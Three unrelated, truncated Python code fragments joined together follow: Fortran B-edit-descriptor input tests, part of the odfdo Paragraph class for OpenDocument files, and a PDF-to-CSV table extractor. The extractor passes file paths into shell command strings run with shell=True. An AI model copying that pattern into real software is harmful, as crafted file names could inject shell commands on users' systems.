self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_683(self):
inp = '''1'''
fmt = '''(B4.3)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_684(self):
inp = '''-1'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_685(self):
inp = '''2'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_686(self):
inp = '''10'''
fmt = '''(B4.3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_687(self):
inp = '''-10'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_688(self):
inp = '''100'''
fmt = '''(B4.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_689(self):
inp = '''-100'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_690(self):
inp = '''1000'''
fmt = '''(B4.3)'''
result = [8]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_691(self):
inp = '''-1000'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_692(self):
inp = '''10000'''
fmt = '''(B4.3)'''
result = [8]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_693(self):
inp = '''-10000'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_694(self):
inp = '''100000'''
fmt = '''(B4.3)'''
result = [8]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_695(self):
inp = '''-100000'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_696(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(B4.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_697(self):
inp = '''10101000'''
fmt = '''(B4.3)'''
result = [10]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_698(self):
inp = '''0'''
fmt = '''(B5.3)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_699(self):
inp = '''-0'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_700(self):
inp = '''1'''
fmt = '''(B5.3)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_701(self):
inp = '''-1'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_702(self):
inp = '''2'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_703(self):
inp = '''10'''
fmt = '''(B5.3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_704(self):
inp = '''-10'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_705(self):
inp = '''100'''
fmt = '''(B5.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_706(self):
inp = '''-100'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_707(self):
inp = '''1000'''
fmt = '''(B5.3)'''
result = [8]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_708(self):
inp = '''-1000'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_709(self):
inp = '''10000'''
fmt = '''(B5.3)'''
result = [16]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_710(self):
inp = '''-10000'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_711(self):
inp = '''100000'''
fmt = '''(B5.3)'''
result = [16]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_712(self):
inp = '''-100000'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_713(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(B5.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_714(self):
inp = '''10101000'''
fmt = '''(B5.3)'''
result = [21]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_715(self):
inp = '''0'''
fmt = '''(B6.3)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_716(self):
inp = '''-0'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_717(self):
inp = '''1'''
fmt = '''(B6.3)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_718(self):
inp = '''-1'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_719(self):
inp = '''2'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_720(self):
inp = '''10'''
fmt = '''(B6.3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_721(self):
inp = '''-10'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_722(self):
inp = '''100'''
fmt = '''(B6.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_723(self):
inp = '''-100'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_724(self):
inp = '''1000'''
fmt = '''(B6.3)'''
result = [8]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_725(self):
inp = '''-1000'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_726(self):
inp = '''10000'''
fmt = '''(B6.3)'''
result = [16]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_727(self):
inp = '''-10000'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_728(self):
inp = '''100000'''
fmt = '''(B6.3)'''
result = [32]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
| |
# Copyright 2018-2020 <NAME>
# Copyright (c) 2009-2013 <NAME>, Itaapy, Pierlis, Talend.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Authors (odfdo project): <EMAIL>
# The odfdo project is a derivative work of the lpod-python project:
# https://github.com/lpod/lpod-python
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
"""Paragraph class for "text:p", Span class for "text:span"
"""
import re
from functools import wraps # for keeping trace of docstring with decorators
from .bookmark import Bookmark, BookmarkStart, BookmarkEnd
from .element import FIRST_CHILD, NEXT_SIBLING, register_element_class, Element
from .paragraph_base import ParagraphBase, Spacer, Tab, LineBreak
from .note import Note, Annotation, AnnotationEnd
from .reference import Reference, ReferenceMark, ReferenceMarkStart, ReferenceMarkEnd
from .link import Link
def _by_regex_offset(method):
@wraps(method)
def wrapper(element, *args, **kwargs):
"""Insert the result of method(element, ...) at the place matching the
regex OR the positional arguments offset and length.
Arguments:
method -- wrapped method
element -- self
regex -- unicode regular expression
offset -- int
length -- int
"""
offset = kwargs.get("offset", None)
regex = kwargs.get("regex", None)
if offset:
length = kwargs.get("length", 0)
counted = 0
for text in element.xpath("//text()"):
if len(text) + counted <= offset:
counted += len(text)
continue
if length > 0:
length = min(length, len(text))
else:
length = len(text)
# Static information about the text node
container = text.parent
upper = container.parent
is_text = text.is_text()
start = offset - counted
end = start + length
# Do not use the text node as it changes at each loop
if is_text:
text = container.text
else:
text = container.tail
before = text[:start]
match = text[start:end]
tail = text[end:]
result = method(element, match, tail, *args, **kwargs)
if is_text:
container.text = before
# Insert as first child
container.insert(result, position=0)
else:
container.tail = before
# Insert as next sibling
index = upper.index(container)
upper.insert(result, position=index + 1)
return
if regex:
pattern = re.compile(regex)
for text in element.xpath("descendant::text()"):
# Static information about the text node
container = text.parent
upper = container.parent
is_text = text.is_text()
# Group positions are calculated and static, so apply in
# reverse order to preserve positions
for group in reversed(list(pattern.finditer(text))):
start, end = group.span()
# Do not use the text node as it changes at each loop
if is_text:
text = container.text
else:
text = container.tail
before = text[:start]
match = text[start:end]
tail = text[end:]
result = method(element, match, tail, *args, **kwargs)
if is_text:
container.text = before
# Insert as first child
container.insert(result, position=0)
else:
container.tail = before
# Insert as next sibling
index = upper.index(container)
upper.insert(result, position=index + 1)
return wrapper
class Paragraph(ParagraphBase):
"""Specialised element for paragraphs "text:p". The "text:p" element
represents a paragraph, which is the basic unit of text in an OpenDocument
file.
"""
_tag = "text:p"
def __init__(self, text_or_element=None, style=None, **kwargs):
"""Create a paragraph element of the given style containing the optional
given text.
Arguments:
text -- str or Element
style -- str
Return: Paragraph
"""
super().__init__(**kwargs)
if self._do_init:
if isinstance(text_or_element, Element):
self.append(text_or_element)
else:
self.text = text_or_element
if style is not None:
self.style = style
def insert_note(
self,
note_element=None,
after=None,
note_class="footnote",
note_id=None,
citation=None,
body=None,
):
if note_element is None:
note_element = Note(
note_class=note_class, note_id=note_id, citation=citation, body=body
)
else:
# XXX clone or modify the argument?
if note_class:
note_element.note_class = note_class
if note_id:
note_element.note_id = note_id
if citation:
note_element.citation = citation
if body:
note_element.note_body = body
note_element.check_validity()
if isinstance(after, str):
self._insert(note_element, after=after, main_text=True)
elif isinstance(after, Element):
after.insert(note_element, FIRST_CHILD)
else:
self.insert(note_element, FIRST_CHILD)
def insert_annotation(
self,
annotation_element=None,
before=None,
after=None,
position=0,
content=None,
body=None,
creator=None,
date=None,
):
"""Insert an annotation, at the position defined by the regex (before,
after, content) or by positionnal argument (position). If content is
provided, the annotation covers the full content regex. Else, the
annotation is positionned either 'before' or 'after' provided regex.
If content is an odf element (ie: paragraph, span, ...), the full inner
content is covered by the annotation (of the position just after if
content is a single empty tag).
If content/before or after exists (regex) and return a group of matching
positions, the position value is the index of matching place to use.
annotation_element can contain a previously created annotation, else
the annotation is created from the body, creator and optional date
(current date by default).
Arguments:
annotation_element -- Annotation or name
before -- str regular expression or None
after -- str regular expression or None
content -- str regular expression or None, or Element
position -- int or tuple of int
body -- str or Element
creator -- str
date -- datetime
"""
if annotation_element is None:
annotation_element = Annotation(
text_or_element=body, creator=creator, date=date, parent=self
)
else:
# XXX clone or modify the argument?
if body:
annotation_element.body = body
if creator:
annotation_element.dc_creator = creator
if date:
annotation_element.dc_date = date
annotation_element.check_validity()
# special case: content is an odf element (ie: a paragraph)
if isinstance(content, Element):
if content.is_empty():
content.insert(annotation_element, xmlposition=NEXT_SIBLING)
return annotation_element
content.insert(annotation_element, start=True)
annotation_end = AnnotationEnd(annotation_element)
content.append(annotation_end)
return annotation_element
# special case
if isinstance(after, Element):
after.insert(annotation_element, FIRST_CHILD)
return annotation_element
# With "content" => automatically insert a "start" and an "end"
# bookmark
if (
before is None
and after is None
and content is not None
and isinstance(position, int)
):
# Start tag
self._insert(
annotation_element, before=content, position=position, main_text=True
)
# End tag
annotation_end = AnnotationEnd(annotation_element)
self._insert(
annotation_end, after=content, position=position, main_text=True
)
return annotation_element
# With "(int, int)" => automatically insert a "start" and an "end"
# bookmark
if (
before is None
and after is None
and content is None
and isinstance(position, tuple)
):
# Start
self._insert(annotation_element, position=position[0], main_text=True)
# End
annotation_end = AnnotationEnd(annotation_element)
self._insert(annotation_end, position=position[1], main_text=True)
return annotation_element
# Without "content" nor "position"
if content is not None or not isinstance(position, int):
raise ValueError("bad arguments")
# Insert
self._insert(
annotation_element,
before=before,
after=after,
position=position,
main_text=True,
)
return annotation_element
def insert_annotation_end(
self, annotation_element, before=None, after=None, position=0
):
"""Insert an annotation end tag for an existing annotation. If some end
tag already exists, replace it. Annotation end tag is set at the
position defined by the regex (before or after).
If content/before or after (regex) returns a group of matching
positions, the position value is the index of matching place to use.
Arguments:
annotation_element -- Annotation (mandatory)
before -- str regular expression or None
after -- str regular expression or None
position -- int
"""
if annotation_element is None:
raise ValueError
if not isinstance(annotation_element, Annotation):
raise ValueError("Not a <office:annotation> Annotation")
# remove existing end tag
name = annotation_element.name
existing_end_tag = self.get_annotation_end(name=name)
if existing_end_tag:
existing_end_tag.delete()
# create the end tag
end_tag = AnnotationEnd(annotation_element)
# Insert
self._insert(
end_tag, before=before, after=after, position=position, main_text=True
)
return end_tag
def set_reference_mark(
self, name, before=None, after=None, position=0, content=None
):
"""Insert a reference mark, at the position defined by the regex
(before, after, content) or by positionnal argument (position). If
content is provided, the annotation covers the full range content regex
(instances of ReferenceMarkStart and ReferenceMarkEnd are
created). Else, an instance of ReferenceMark is positionned either
'before' or 'after' provided regex.
If content is an ODF Element (ie: Paragraph, Span, ...), the full inner
content is referenced (of the position just after if content is a single
empty tag).
If content/before or after exists (regex) and return a group of matching
positions, the position value is the index of matching place to use.
Name is mandatory and shall be unique in the document for the preference
mark range.
Arguments:
name -- str
before -- str regular expression or None
after -- str regular expression or None, or Element
content -- str regular expression or None, or Element
position -- int or tuple of int
Return: | |
<filename>pdf_to_csv.py<gh_stars>10-100
'Class for extracting CSV files from single table per page PDF documents'
import argparse
import numpy
import csv
import cv2
import logging
from logging.config import fileConfig
import ConfigParser
import io
import os
from PyPDF2 import PdfFileReader, PdfFileWriter
import re
import subprocess
fileConfig('parsers/logging_config.ini')
logger = logging.getLogger()
BUFFER_LENGTH = 10
DEFAULT_PIXEL_COLOR = [255, 255, 255]
PAGE_BREAK_HANDLE = '"||page_break||"'
DEFAULT_APERTURE_SIZE = 3
class PDF2CSV(object):
"""
Base Class for converting pdf to csv.
"""
def __init__(self):
self.page_break = PAGE_BREAK_HANDLE
self.temp_img_file = ''
self.temp_csv_file = ''
def generate_csv_file(self, input_pdf_filepath, out_csv_filepath,
is_header=True, identify_columns=False,
temp_file_postfix="", check_page_rotation=False):
"""
Generate the csv file for a given pdf.
We loop through all the pages from the pdf and generate tables from it.
Args:
- input_pdf_filepath (string): The path of the pdf to be parsed.
- out_csv_filepath (string): The path where the parsed csv to
be stored.
- is_header (boolean): Whether we should be looking
for headers while detecting table limits. Defaults to True
- identify_columns (boolean): ????
- temp_file_postfix (string): optional postfix for the temp files
generated for the processing. Defaults to an empty string ""
- check_page_rotation (boolean): The program tries to detect the
table with multiple rotation angles.
Returns:
None
"""
input_pdf_obj = PdfFileReader(open(input_pdf_filepath, 'rb'))
total_pages = input_pdf_obj.getNumPages()
department_name = os.path.basename(input_pdf_filepath).lower().split(".pdf")[0].decode('utf-8')
temp_handle = re.sub(r'[^A-Za-z0-9]', '_', department_name)
self.temp_pdf_file = '/tmp/temp_doc_%s%s.pdf' % (temp_handle,
temp_file_postfix)
self.temp_img_file = '/tmp/pdf_image_%s%s.png' % (temp_handle,
temp_file_postfix)
self.temp_csv_file = '/tmp/temp_data_%s%s.csv' % (temp_handle,
temp_file_postfix)
out_file_obj = open(self.temp_csv_file, 'w')
for page_num in range(total_pages):
page_table_data = self.generate_page_table_data(input_pdf_filepath,
input_pdf_obj,
page_num,
is_header,
identify_columns,
check_page_rotation)
if page_table_data:
out_file_obj.write("\n%s" % page_table_data)
out_file_obj.write("\n%s" % self.page_break)
out_file_obj.close()
self.process_csv_file(out_csv_filepath)
def generate_page_table_data(self, input_pdf_filepath, input_pdf_obj,
page_num, is_header, identify_columns,
check_page_rotation):
'''Convert a pdf page into table using image processing and tabula.
This function acts as the pipeline through which we extract tables
from pdf. The pipeline consists of the following steps : -
- Check Rotation of the page.
- Generate Image of the page using `convert` command.
- Detect lines for the table.
- Use tabula with the coordinates detected from the previous
processes.
Args:
- input_pdf_filepath (string): The path of the pdf to be parsed.
- input_pdf_obj (obj:`PdfFileReader`): pdf file reader object used
to access information from the pdf.
- page_num (int): The page number to detect tables on.
- is_header (boolean): Used while detecting table limits.
- indentify_columns (boolean): ???
- check_page_rotation (boolean): The program tries to detect the
table with multiple rotation angles.
Returns:
A (???? format ????) table data extracted from the page.
'''
page_table_data = ""
page_layout = input_pdf_obj.getPage(page_num)['/MediaBox']
if '/Rotate' in input_pdf_obj.getPage(page_num) and input_pdf_obj.getPage(page_num)['/Rotate'] == 90:
page_width = float(page_layout[3])
page_height = float(page_layout[2])
else:
page_width = float(page_layout[2])
page_height = float(page_layout[3])
command = "convert -density 300 '%s'[%s] '%s'" % (input_pdf_filepath,
page_num,
self.temp_img_file)
subprocess.check_output(command, shell=True)
self.image_object = cv2.imread(self.temp_img_file)
image_height, image_width, channels = self.image_object.shape
self.horizontal_ratio = page_width/image_width
self.vertical_ratio = page_height/image_height
lines = self.get_straight_lines()
table_limits = self.get_table_limits(lines, is_header)
column_coordinates = None
if identify_columns:
lines = self.modify_image(lines, table_limits)
if type(lines).__module__ == "numpy":
lines, column_coordinates = self.extend_lines_for_table(lines,
is_header,
table_limits)
table_bounds = self.get_table_bounds()
tabula_command = self.get_tabula_command_extenstion()
if table_bounds and column_coordinates:
if identify_columns:
column_values = ""
for value in column_coordinates:
if column_values:
column_values += "," + str(value)
else:
column_values = str(value)
command = "%s --pages %s --area %s,%s,%s,%s --columns %s '%s'" % (tabula_command, page_num+1, table_bounds["top"], table_bounds["left"], table_bounds["bottom"], table_bounds["right"], column_values, input_pdf_filepath)
else:
command = "%s --pages %s --area %s,%s,%s,%s '%s'" % (tabula_command, page_num+1, table_bounds["top"], table_bounds["left"], table_bounds["bottom"], table_bounds["right"], input_pdf_filepath)
logger.info("Processing: %s" % command)
try:
page_table_data = subprocess.check_output(command, shell=True)
except subprocess.CalledProcessError as e:
logger.error("command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
page_table_data = e.output
if not page_table_data and check_page_rotation:
logger.info("Rotating Page")
rotated_pdf_obj = self.get_rotated_pdf_obj(input_pdf_obj, page_num)
page_table_data = self.generate_page_table_data(self.temp_pdf_file, rotated_pdf_obj, 0, is_header, check_page_rotation=False)
else:
warning_message = "No table found on {0} from file {1}"
logger.warning(warning_message.format(page_num, input_pdf_filepath))
return page_table_data
def get_rotated_pdf_obj(self, input_pdf_obj, page_num):
'''Rotate a given pdf clockwise 90 degress.
Args:
input_pdf_obj (obj:`PdfFileReader`): PdfFileReader object of the
file to rotate.
page_num (int): Page number to rotate.
Returns:
A PdfFileReader object of the rotated pdf.
'''
temp_pdf_obj = PdfFileWriter()
temp_pdf_obj.addPage(input_pdf_obj.getPage(page_num).rotateClockwise(90))
output_stream = file(self.temp_pdf_file, "wb")
temp_pdf_obj.write(output_stream)
output_stream.close()
rotated_pdf_obj = PdfFileReader(open(self.temp_pdf_file, 'rb'))
return rotated_pdf_obj
def get_straight_lines(self, aperture_size=DEFAULT_APERTURE_SIZE):
'''Extract long straight lines using Probabilistic Hough Transform
'''
image_gray = cv2.cvtColor(self.image_object, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(image_gray, 100, 150, apertureSize=aperture_size)
min_line_length = 100
max_line_gap = 100
lines = cv2.HoughLinesP(edges, 1, numpy.pi/180, 80, min_line_length,
max_line_gap)
return lines
def get_table_limits(self, lines, is_header):
'''Get maximum horizontal and vertical line coordinates for bounding box
'''
table_limits = {}
found_horizontal_line = False
found_vertical_line = False
vertical_stretch = [0,0]
horizontal_stretch = [0,0]
max_horizontal = [0,0,0,0]
max_vertical = [0,0,0,0]
horizontal_base_line = 0
if is_header:
horizontal_base_line = self.get_horizontal_base_line(lines)
vertical_base_line = 0
if type(lines).__module__ == "numpy":
for line in lines:
for x1,y1,x2,y2 in line:
if x1 == x2:
if not found_vertical_line:
found_vertical_line = True
length = (y1 - y2)
if max_vertical[0] <= length:
max_vertical[0] = length
max_vertical[1] = y1 + BUFFER_LENGTH
max_vertical[2] = y2 - BUFFER_LENGTH
if (max_vertical[3] == 0 or max_vertical[3] > (x1 - BUFFER_LENGTH)) and (x1 - BUFFER_LENGTH) > vertical_base_line:
max_vertical[3] = (x1 - BUFFER_LENGTH)
horizontal_stretch = self.get_max_stretch(x1, horizontal_stretch)
elif y1 == y2:
if not found_horizontal_line:
found_horizontal_line = True
length = (x2 - x1)
if max_horizontal[0] <= length:
max_horizontal[0] = length
max_horizontal[1] = x1 - BUFFER_LENGTH
max_horizontal[2] = x2 + BUFFER_LENGTH
if (max_horizontal[3] == 0 or max_horizontal[3] > (y1 - BUFFER_LENGTH)) and (y1 - BUFFER_LENGTH) > horizontal_base_line:
max_horizontal[3] = (y1 - BUFFER_LENGTH)
if not is_header:
vertical_stretch = self.get_max_stretch(y1, vertical_stretch)
if max_vertical[2] > max_horizontal[3] and max_horizontal[3] > 0:
max_vertical[2] = max_horizontal[3]
if max_horizontal[1] > max_vertical[3] and max_vertical[3] > 0:
max_horizontal[1] = max_vertical[3]
if (not found_vertical_line and found_horizontal_line) or not is_header:
max_vertical[1:3] = vertical_stretch
elif not found_horizontal_line and found_vertical_line:
max_horizontal[1:3] = horizontal_stretch
max_vertical = self.fix_vertical_lines(lines, max_vertical)
table_limits["horizontal"] = {"stretch": horizontal_stretch, "found": found_horizontal_line, "max": max_horizontal}
table_limits["vertical"] = {"stretch": vertical_stretch, "found": found_vertical_line, "max": max_vertical}
return table_limits
def extend_lines_for_table(self, lines, is_header, table_limits):
'''
Extend straight lines to create table bounds
'''
column_coordinates = []
for line in lines:
for x1, y1, x2, y2 in line:
if x1 == x2:
y1 = table_limits["vertical"]["max"][1]
y2 = table_limits["vertical"]["max"][2]
column_coordinates.append(x1)
elif y1 == y2:
x1 = table_limits["horizontal"]["max"][1]
x2 = table_limits["horizontal"]["max"][2]
cv2.line(self.image_object, (x1, y1), (x2, y2), (0, 0, 0), 4)
cv2.line(self.image_object,
(table_limits["horizontal"]["max"][2],
table_limits["vertical"]["max"][1]),
(table_limits["horizontal"]["max"][2],
table_limits["vertical"]["max"][2]),
(0, 0, 0), 4)
cv2.line(self.image_object,
(table_limits["horizontal"]["max"][1],
table_limits["vertical"]["max"][1]),
(table_limits["horizontal"]["max"][1],
table_limits["vertical"]["max"][2]),
(0, 0, 0), 4)
cv2.imwrite(self.temp_img_file, self.image_object)
if column_coordinates:
column_coordinates = self.get_clubbed_column_coordinates(column_coordinates)
return lines, column_coordinates
def get_max_stretch(self, coordinate, stretch_vector):
if stretch_vector[0] == stretch_vector[1] == 0:
stretch_vector[0] = stretch_vector[1] = coordinate + BUFFER_LENGTH
elif coordinate < stretch_vector[0]:
stretch_vector[0] = coordinate - BUFFER_LENGTH
elif coordinate > stretch_vector[1]:
stretch_vector[1] = coordinate + BUFFER_LENGTH
return stretch_vector
def get_clubbed_column_coordinates(self, column_coordinates):
clubbed_column_coordinates = []
column_cluster_list = []
column_coordinates = list(set(column_coordinates))
column_coordinates.sort()
pivot = column_coordinates[0]
point_cluster = []
for point in column_coordinates:
if point - pivot < BUFFER_LENGTH:
point_cluster.append(point)
else:
pivot = point
column_cluster_list.append(point_cluster)
point_cluster = [point]
if point_cluster:
column_cluster_list.append(point_cluster)
for column_cluster in column_cluster_list:
clubbed_column_coordinates.append((sum(column_cluster)/len(column_cluster))*self.horizontal_ratio)
return clubbed_column_coordinates
def fix_vertical_lines(self, lines, max_vertical):
image_height, image_width, channels = self.image_object.shape
if max_vertical[1] > max_vertical[2]:
min_vertical_index = 2
else:
min_vertical_index = 1
